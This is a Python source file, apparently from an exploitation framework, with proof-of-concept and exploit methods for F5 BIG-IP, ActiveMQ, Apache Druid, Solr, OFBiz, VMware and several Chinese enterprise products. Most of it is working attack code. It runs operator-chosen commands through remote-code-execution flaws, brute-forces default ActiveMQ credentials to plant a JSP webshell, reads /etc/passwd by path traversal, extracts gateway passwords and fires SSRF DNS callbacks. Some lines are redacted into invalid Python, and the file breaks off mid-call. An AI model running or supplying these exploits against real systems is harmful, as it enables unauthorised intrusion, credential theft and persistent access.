def cve_2021_22986_exp(self, cmd):
    """Send *cmd* to the BIG-IP iControl REST ``/mgmt/tm/util/bash`` endpoint and print the reply.

    The request carries the same fixed ``Authorization: Basic YWRtaW46`` header and empty
    ``X-F5-Auth-Token`` as the matching poc; *cmd* is spliced into the JSON body and the
    ``commandResult`` field of the response is handed to ``verify.exploit_print`` together
    with the raw exchange. Timeouts, connection errors and anything else (including a
    non-JSON reply) are reported through the corresponding ``verify`` printer.
    """
    vul_name = "F5 BIG-IP: CVE-2021-22986"
    request_headers = {
        'User-Agent': self.ua,
        'Accept': '*/*',
        'Connection': 'close',
        'Authorization': 'Basic YWRtaW46',
        'X-F5-Auth-Token': '',
        'Content-Type': 'application/json'
    }
    body_template = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''
    body = body_template.replace("RECOMMAND", cmd)
    target = urljoin(self.url, "/mgmt/tm/util/bash")
    try:
        # verify=False is used on every request in this module (presumably for
        # self-signed appliance certificates); it also disables TLS server checks.
        response = requests.post(target, data=body, headers=request_headers,
                                 timeout=self.timeout, verify=False)
        result = json.loads(response.text)["commandResult"]
        self.raw_data = dump.dump_all(response).decode('utf-8', 'ignore')
        verify.exploit_print(result, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
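def cve_2016_3088_exp(self, cmd):
    """Exploit path for ActiveMQ CVE-2016-3088: place ``self.jsp_webshell`` via fileserver PUT/MOVE and call it with *cmd*.

    Steps, in order: try each ``admin:<password>`` pair in ``self.passlist`` against
    ``/admin/test/systemProperties.jsp`` to read ``activemq.home``; PUT ``self.exp`` to
    ``/fileserver/v.txt``; MOVE it to ``<activemq.home>/webapps/api/<name>.jsp``; GET the moved
    file with ``cmd`` and print the response through ``verify.exploit_print``.

    ``self.threadLock`` is held for the whole method and is released in ``finally``. The
    previous version acquired the lock and never released it, so any later method that
    acquires the same lock would block forever once this one had run. If no credential pair
    yields a path the method now stops before the PUT/MOVE instead of targeting
    ``file://null/...``.
    """
    self.threadLock.acquire()
    try:
        vul_name = "Apache AcitveMQ: CVE-2016-3088"
        self.path = "null"
        self.name = random_md5()
        self.webshell = "/" + self.name + ".jsp"
        self.exp = self.jsp_webshell
        self.passlist = [
            "admin:123456",
            "admin:admin",
            "admin:123123",
            "admin:activemq",
            "admin:12345678"
        ]
        try:
            for self.pa in self.passlist:
                self.base64_p = base64.b64encode(str.encode(self.pa))
                self.p = self.base64_p.decode('utf-8')
                self.headers_base64 = {
                    'User-Agent': self.ua,
                    'Authorization': 'Basic ' + self.p
                }
                url = urljoin(self.url, "/admin/test/systemProperties.jsp")
                self.request = requests.get(url, headers=self.headers_base64,
                                            timeout=self.timeout, verify=False)
                if self.request.status_code == 200:
                    # findall()[0] raises IndexError when activemq.home is absent from the
                    # page; that lands in the generic handler below, as before.
                    self.path = re.findall('<td class="label">activemq.home</td>.*?<td>(.*?)</td>',
                                           self.request.text, re.S)[0]
                    break
            if self.path == "null":
                # No credential pair worked: there is no install path to MOVE into.
                verify.error_print(vul_name)
                return
            self.request = requests.put(self.url + "/fileserver/v.txt", headers=self.headers_base64,
                                        data=self.exp, timeout=self.timeout, verify=False)
            self.headers_move = {
                'User-Agent': self.ua,
                'Destination': 'file://' + self.path + '/webapps/api' + self.webshell
            }
            self.request = requests.request("MOVE", self.url + "/fileserver/v.txt",
                                            headers=self.headers_move, timeout=self.timeout,
                                            verify=False)
            # raw_data records the MOVE exchange, not the final GET.
            self.raw_data = dump.dump_all(self.request).decode('utf-8', 'ignore')
            self.request = requests.get(self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd,
                                        headers=self.headers_base64, timeout=self.timeout,
                                        verify=False)
            self.r = "[webshell: " + self.url + "/api" + self.webshell + "?pwd=password&cmd=" + cmd + " ]\n"
            self.r += self.request.text
            verify.exploit_print(self.r, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)
    finally:
        self.threadLock.release()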
def cve_2021_25646_exp(self, cmd):
    """POST the Druid sampler payload with *cmd* substituted and print a fixed "no echo" result.

    ``self.payload_cve_2021_25646`` is the request template; its ``RECOMMAND`` marker is
    replaced by *cmd*. The endpoint returns no command output, so the printed result is
    always the same string and only the raw exchange tells the caller what happened.
    """
    vul_name = "Apache Druid: CVE-2021-25646"
    target = urljoin(self.url, "/druid/indexer/v1/sampler")
    request_headers = {
        'Content-Type': 'application/json',
        'User-Agent': self.ua,
        'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
        'Connection': 'keep-alive'
    }
    body = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
    try:
        response = requests.post(target, data=body, headers=request_headers,
                                 timeout=self.timeout, verify=False)
        exchange = dump.dump_all(response).decode('utf-8', 'ignore')
        verify.exploit_print("Command Executed Successfully (But No Echo)", exchange)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
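def cve_2021_22986_poc(self):
    """PoC for F5 BIG-IP CVE-2021-22986: run ``echo <marker>`` via ``/mgmt/tm/util/bash`` and look for the marker.

    Fills the ``self.vul_info`` report fields, posts the JSON command body with the fixed
    ``Authorization: Basic YWRtaW46`` header and empty ``X-F5-Auth-Token``, and sets
    ``prt_resu`` to ``PoCSuCCeSS`` when the echoed marker is found in ``commandResult``.
    ``verify.scan_print`` is called on every completed request; transport errors go to the
    ``verify`` printers instead.

    ``self.threadLock`` is released in ``finally`` so an interrupt cannot leave it held.
    The reply is only parsed as JSON on a 200; other codes (for example a 401 HTML page)
    used to fail in ``json.loads`` and be reported as a generic error.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2021-22986"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
        self.vul_info["vul_numb"] = "CVE-2021-22986"
        # was "Flink" -- a copy-paste leftover; the product is F5 BIG-IP as prt_name says
        self.vul_info["vul_apps"] = "F5 BIG-IP"
        self.vul_info["vul_date"] = "2021-03-11"
        self.vul_info["vul_vers"] = "< 16.0.1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Remote Code Execution"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = ("BIG-IP存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过BIG-IP"
                                     "管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,"
                                     "创建或删除文件以及替换服务。该中断只能通过控制界面利用,而不能通过数据界面利用。")
        self.vul_info["cre_date"] = "2021-03-20"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            'User-Agent': self.ua,
            'Accept': '*/*',
            'Connection': 'close',
            'Authorization': 'Basic YWRtaW46',
            'X-F5-Auth-Token': '',
            'Content-Type': 'application/json'
        }
        md = random_md5()
        cmd = "echo " + md
        data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace("RECOMMAND", cmd)
        url = urljoin(self.url, "/mgmt/tm/util/bash")
        try:
            request = requests.post(url, data=data, headers=headers,
                                    timeout=self.timeout, verify=False)
            if request.status_code == 200:
                r = json.loads(request.text)["commandResult"]
                # misinformation() is the module's false-positive filter; a hit means the
                # echoed marker is present in the command output
                if md in misinformation(r, md):
                    self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                    self.vul_info["vul_payd"] = data
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()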
def time_2021_0410_exp(self, cmd):
    """Run *cmd* through the NS-NGFW ``deleteImage`` RPC and print the contents of the redirected output file.

    The command is appended to the ``data`` argument of the RPC so its stdout lands in
    ``/var/www/html/<marker>.txt``; a second GET fetches that file and its body is printed.
    The raw exchange attached to the result is the first (POST) request, not the GET.
    """
    vul_name = "QiAnXin NS-NGFW: time-2021-0410"
    rpc_url = urljoin(self.url, "/directdata/direct/router")
    marker = random_md5()
    shell_line = "/var/www/html/d.txt;" + cmd + " > /var/www/html/" + marker + ".txt"
    rpc_body = json.dumps({
        "action": "SSLVPN_Resource",
        "method": "deleteImage",
        "data": [{"data": [shell_line]}],
        "type": "rpc",
        "tid": 17
    })
    try:
        rpc_response = requests.post(rpc_url, data=rpc_body, headers=self.headers,
                                     timeout=self.timeout, verify=False)
        output_url = urljoin(self.url, marker + ".txt")
        output_response = requests.get(output_url, data="1", headers=self.headers,
                                       timeout=self.timeout, verify=False)
        self.raw_data = dump.dump_all(rpc_response).decode('utf-8', 'ignore')
        verify.exploit_print(output_response.text, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
def cve_2021_27905_poc(self):
    """PoC for Apache Solr CVE-2021-27905 (ReplicationHandler SSRF) using a DNS callback.

    Reads the first core name from ``/solr/admin/cores``, builds a ``replication?command=fetchindex``
    URL whose ``masterUrl`` points at a ``dns_request()`` domain, and marks the target as
    vulnerable when ``dns_result()`` shows the callback.

    NOTE(review): the ``payload`` line below is not valid Python as it stands -- the
    ``httpBasicAuthUser``/``httpBasicAuthPassword`` values appear to have been redacted to
    ``"******"`` when this file was captured, and the ``.replace(`` call that follows lost
    its opening. It is left byte-identical here; restore it from the original source before
    use.

    NOTE(review): the bare ``except: pass`` hides any failure of the core lookup, after which
    ``core_name`` is still ``None`` and ``.replace("re_core_name", None)`` raises TypeError,
    reported only as a generic error. ``cre_date`` is not set in this report, unlike the
    sibling methods.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
    self.vul_info["vul_numb"] = "CVE-2021-27905"
    self.vul_info["vul_apps"] = "Solr"
    self.vul_info["vul_date"] = "2021-04-14"
    self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "SSRF"
    self.vul_info["vul_data"] = "null"
    self.vul_info[
        "vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
    self.vul_info["cre_auth"] = "zhzyker"
    core_name = None
    # callback domain from the module's DNS-log helper
    dns = dns_request()
    url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
        try:
            # first key of the "status" object is taken as the core name
            core_name = list(json.loads(request.text)["status"])[0]
        except:
            pass
        # NOTE(review): redacted / syntactically broken in this copy -- see docstring
        payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \
                  "=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns)
        url_ssrf = urljoin(self.url, payload)
        r = requests.get(url_ssrf, headers=self.headers, timeout=self.timeout, verify=False)
        # dns_result() is expected to return text containing the domain on a hit
        if dns in dns_result(dns):
            self.vul_info["vul_payd"] = url_ssrf
            self.vul_info["vul_data"] = dump.dump_all(r).decode(
                'utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info[
                "prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        verify.error_print(self.vul_info["prt_name"])
    # not in a finally: a BaseException (e.g. KeyboardInterrupt) leaves the lock held
    self.threadLock.release()
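def time_2021_0515_poc(self):
    """PoC for the E-cology OA ``WorkflowServiceXml`` RCE (tracked here as time-2021-0515).

    Posts ``self.payload_time_2021_0515`` to ``/services%20/WorkflowServiceXml`` with the
    command carried in a ``cmd`` header, and marks success when the echoed marker is in the
    body and the status is 500 (the condition the original author chose).

    ``vul_numb`` now matches ``prt_name`` (it was left at ``time-2021-0415`` from a copied
    template); the lock is released in ``finally`` and a commented-out debug print was dropped.
    """
    self.threadLock.acquire()
    try:
        self.vul_info[
            "prt_name"] = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "E-cology OA WorkflowServiceXml RCE"
        self.vul_info["vul_numb"] = "time-2021-0515"
        self.vul_info["vul_apps"] = "E-cology"
        self.vul_info["vul_date"] = "2021-05-15"
        self.vul_info["vul_vers"] = "E-cology <= 9.0"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "RCE"
        self.vul_info["vul_data"] = "null"
        self.vul_info[
            "vul_desc"] = "The WorkflowServiceXml interface can be accessed without authorization. The attacker can call this interface to construct a specific HTTP request to bypass the security restrictions of E-cology itself to achieve remote command execution."
        self.vul_info["cre_date"] = "2021-05-19"
        self.vul_info["cre_auth"] = "zhzyker"
        url = urljoin(self.url, "/services%20/WorkflowServiceXml")
        md = random_md5()
        cmd = "echo " + md
        headers = {
            'User-Agent': self.ua,
            'SOAPAction': '""',
            'cmd': cmd,
            "Content-Type": "text/xml;charset=UTF-8"
        }
        data = self.payload_time_2021_0515
        try:
            request = requests.post(url, data=data, headers=headers,
                                    timeout=self.timeout, verify=False)
            if md in misinformation(request.text, md) and request.status_code == 500:
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = data
                self.vul_info["prt_info"] = "[rce: " + url + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()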
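def cve_2021_25646_poc(self):
    """PoC for Apache Druid CVE-2021-25646 using a DNS callback.

    Substitutes ``ping <dns_request() domain>`` into ``self.payload_cve_2021_25646``, posts it
    to ``/druid/indexer/v1/sampler`` and marks success when ``dns_result()`` reports the
    lookup. ``verify.scan_print`` runs on every completed request.

    The lock is released in ``finally`` so an interrupt cannot leave it held.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
        self.vul_info["vul_numb"] = "CVE-2021-25646"
        self.vul_info["vul_apps"] = "Druid"
        self.vul_info["vul_date"] = "2021-02-01"
        self.vul_info["vul_vers"] = "< 0.20.1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行漏洞"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = ("Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。"
                                     "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,"
                                     "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。"
                                     "攻击者可直接构造恶意请求执行任意代码,控制服务器。")
        self.vul_info["cre_date"] = "2021-02-03"
        self.vul_info["cre_auth"] = "zhzyker"
        url = urljoin(self.url, "/druid/indexer/v1/sampler")
        headers = {
            'Content-Type': 'application/json',
            'User-Agent': self.ua,
            'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
            'Connection': 'keep-alive'
        }
        # callback domain from the module's DNS-log helper
        md = dns_request()
        cmd = "ping " + md
        data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
        try:
            request = requests.post(url, data=data, headers=headers,
                                    timeout=self.timeout, verify=False)
            # dns_result() truthiness is what the sibling PoCs rely on as well
            if dns_result(md):
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                self.vul_info["vul_payd"] = data
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()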
def cnvd_2021_26422_exp(self, cmd):
    """POST *cmd* inside the ``type`` parameter of the Eyou ``moni_detail.do`` endpoint and print the response body."""
    vul_name = "Eyou Email System: CNVD-2021-26422"
    target = urljoin(self.url, "/webadm/?q=moni_detail.do&action=gragh")
    body = "type='|" + cmd + "||'"
    try:
        response = requests.post(target, data=body, headers=self.headers,
                                 timeout=self.timeout, verify=False)
        self.raw_data = dump.dump_all(response).decode('utf-8', 'ignore')
        verify.exploit_print(response.text, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
def time_2021_0424_poc(self):
    """PoC for the Ruijie-EG gateway credential disclosure via ``/login.php`` (tracked here as time-2021-0424).

    Posts a crafted ``username=admin&password=...`` body, reads the ``data`` field of the JSON
    reply and extracts user/password with regular expressions.

    NOTE(review): the two ``prt_info`` assignments below contain ``"******"`` where the
    original concatenation of ``user`` / ``pasd`` evidently stood; as captured they are not
    valid Python and are left byte-identical. Restore them from the original source.

    NOTE(review): ``vul_numb`` is ``time-2021-0415`` while ``prt_name`` says
    ``time-2021-0424`` -- looks like a copied template value. ``findall(...)[0]`` raises
    IndexError when a pattern does not match; that surfaces only as a generic error.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Ruijie-EG Easy Gateway: time-2021-0424"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Get account password, background rce"
    self.vul_info["vul_numb"] = "time-2021-0415"
    self.vul_info["vul_apps"] = "RuiJie"
    self.vul_info["vul_date"] = "2021-04-24"
    self.vul_info["vul_vers"] = "unknow"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "RCE"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Get account password, background rce"
    self.vul_info["cre_date"] = "2021-04-26"
    self.vul_info["cre_auth"] = "zhzyker"
    url = urljoin(self.url, "/login.php")
    payload = "username=admin&password=admin?show+webmaster+user"
    try:
        request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False)
        # "data" is expected to be the text output of the injected command
        res = json.loads(request.text)["data"]
        get_user = re.search('admin', res)
        if get_user:
            # two output layouts are handled: with a second "01. " entry the password
            # line ends in "\r\r", otherwise it runs to end of line
            if r"01. " in res:
                user = re.findall("00. (.*?) ", res)[0]
                pasd = re.findall(r"admin (.*)\r\r", res)[0]
            else:
                user = re.findall("00. (.*?) ", res)[0]
                pasd = re.findall(r"admin (.*)", res)[0]
            if user and pasd:
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = payload
                # NOTE(review): redacted in this copy -- see docstring
                self.vul_info["prt_info"] = "[username:"******"] [password:"******"]"
            elif user:
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = payload
                # NOTE(review): redacted in this copy -- see docstring
                self.vul_info["prt_info"] = "[user&pass:"******"]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as error:
        verify.error_print(self.vul_info["prt_name"])
    # not in a finally: a BaseException (e.g. KeyboardInterrupt) leaves the lock held
    self.threadLock.release()
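def cve_2021_21975_poc(self):
    """PoC for VMware vRealize Operations Manager CVE-2021-21975 (SSRF) using a DNS callback.

    Posts a JSON array holding a ``dns_request()`` domain to ``/casa/nodes/thumbprints`` and
    marks success when ``dns_result()`` reports the lookup.

    ``vul_numb`` now carries CVE-2021-21975, matching ``prt_name``; it previously said
    CVE-2021-21972 (a different vulnerability), which would mislabel the report. The lock is
    released in ``finally``.
    """
    self.threadLock.acquire()
    try:
        self.vul_info[
            "prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info[
            "vul_name"] = "VMware vRealize Operations Manager API SSRF"
        self.vul_info["vul_numb"] = "CVE-2021-21975"
        self.vul_info["vul_apps"] = "Vmware"
        self.vul_info["vul_date"] = "2021-03-31"
        self.vul_info["vul_vers"] = "<= 8.3.0"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "SSRF"
        self.vul_info["vul_data"] = "null"
        self.vul_info[
            "vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击"
        self.vul_info["cre_date"] = "2021-04-01"
        self.vul_info["cre_auth"] = "zhzyker"
        try:
            headers = {
                "User-Agent": self.ua,
                "Content-Type": "application/json;charset=UTF-8"
            }
            dns = dns_request()
            data = '["' + dns + '"]'
            url = urljoin(self.url, "/casa/nodes/thumbprints")
            res = requests.post(url, data=data, headers=headers,
                                timeout=self.timeout, verify=False)
            if dns_result(dns):
                self.vul_info["vul_data"] = dump.dump_all(res).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = data
                self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()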
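def cve_2020_5902_poc(self):
    """PoC for F5 BIG-IP TMUI CVE-2020-5902.

    First GETs ``getTabSet.jsp`` through the ``/tmui/login.jsp/..;/`` prefix and checks that
    the marker in ``tabId`` is reflected; only then reads ``/etc/passwd`` through
    ``fileRead.jsp`` and marks success when the body looks like a passwd file.
    ``verify.scan_print`` runs on every completed exchange.

    ``vul_apps`` now says F5 BIG-IP (it was "Flink", a copy-paste leftover); the lock is
    released in ``finally``.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2020-5902"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
        self.vul_info["vul_numb"] = "CVE-2020-5902"
        self.vul_info["vul_apps"] = "F5 BIG-IP"
        self.vul_info["vul_date"] = "2020-07-15"
        self.vul_info["vul_vers"] = "< 11.6.x"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Remote Code Execution"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = ("The Traffic Management User Interface (TMUI), also referred to as the "
                                     "Configuration utility, has a Remote Code Execution (RCE) vulnerability in "
                                     "undisclosed pages. (CVE-2020-5902)")
        self.vul_info["cre_date"] = "2021-03-20"
        self.vul_info["cre_auth"] = "zhzyker"
        url = urljoin(self.url, "/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=CVE-2020-5902")
        try:
            request = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False)
            if request.status_code == 200 and r"CVE-2020-5902" in request.text:
                url = self.url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
                request = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False)
                if r"root:x:0:0:" in request.text and r"daemon:x:" in request.text and r"nologin" in request.text:
                    self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                    self.vul_info["vul_payd"] = url
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["prt_info"] = "[rce] [url:" + url + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()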
def cve_2020_5902_exp(self, cmd):
    """Read a file through the TMUI ``fileRead.jsp`` path-traversal and print the body.

    Despite its name, *cmd* is used as the ``fileName`` query value, not as a shell command.
    """
    vul_name = "F5 BIG-IP: CVE-2020-5902"
    read_path = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=" + cmd
    target = urljoin(self.url, read_path)
    try:
        response = requests.get(target, headers=self.headers,
                                timeout=self.timeout, verify=False)
        self.raw_data = dump.dump_all(response).decode('utf-8', 'ignore')
        verify.exploit_print(response.text, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
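def time_2021_0414_poc(self):
    """PoC for the Coremail ``mailsms`` configuration disclosure (tracked here as time-2021-0414).

    GETs ``/mailsms/s?func=ADMIN:appState&dumpConfig=/`` and marks success on a 200 whose
    body lacks ``FS_IP_NOT_PERMITTED`` and contains ``/home/coremail``.

    ``vul_type`` now says "Information Disclosure" to match ``vul_name``/``vul_desc`` (it was
    "RCE", copied from a template); the probe path is held in one local so ``vul_payd`` and the
    request cannot drift apart; the lock is released in ``finally``.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "CoreMail: time-2021-0414"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info[
            "vul_name"] = "Coremail configuration information disclosure vulnerability"
        self.vul_info["vul_numb"] = "time-2021-0414"
        self.vul_info["vul_apps"] = "CoreMail"
        self.vul_info["vul_date"] = "2021-04-19"
        self.vul_info["vul_vers"] = "unknow"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Information Disclosure"
        self.vul_info["vul_data"] = "null"
        self.vul_info[
            "vul_desc"] = "Coremail configuration information disclosure vulnerability"
        self.vul_info["cre_date"] = "2021-04-29"
        self.vul_info["cre_auth"] = "zhzyker"
        probe_path = "/mailsms/s?func=ADMIN:appState&dumpConfig=/"
        url = urljoin(self.url, probe_path)
        try:
            request = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False)
            if request.status_code == 200:
                if r"FS_IP_NOT_PERMITTED" not in request.text and r"/home/coremail" in request.text:
                    self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["vul_payd"] = probe_path
                    self.vul_info["prt_info"] = "[url:" + url + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()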
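def cve_2021_26295_exp(self, cmd):
    """Exploit path for Apache OFBiz CVE-2021-26295: two SOAP posts to ``/webtools/control/SOAPService``.

    The first post (``self.payload_cve_2021_26295_exp_1``) is a probe; only when its reply
    contains ``cus-obj`` is the second payload (``..._exp_2``) sent. Neither returns command
    output, so the printed result only reflects the HTTP status of the second post. If the
    probe does not answer as expected the failure message is printed with the probe exchange
    instead of printing nothing.

    The hand-rolled ``_trans`` hex encoder was replaced by ``bytes.hex()``, which yields the
    same lowercase two-digit encoding.
    """
    vul_name = "Apache OFBiz: CVE-2021-26295"
    headers = {
        'User-Agent': self.ua,
        'Content-Type': 'text/xml',
        'Connection': 'close'
    }
    try:
        # the payload templates expect the command as a lowercase hex byte string
        cmd_hex = cmd.encode("utf8").hex()
        data = self.payload_cve_2021_26295_exp_1.replace("RECOMMAND", cmd_hex)
        url = urljoin(self.url, "/webtools/control/SOAPService")
        request = requests.post(url, data=data, headers=headers,
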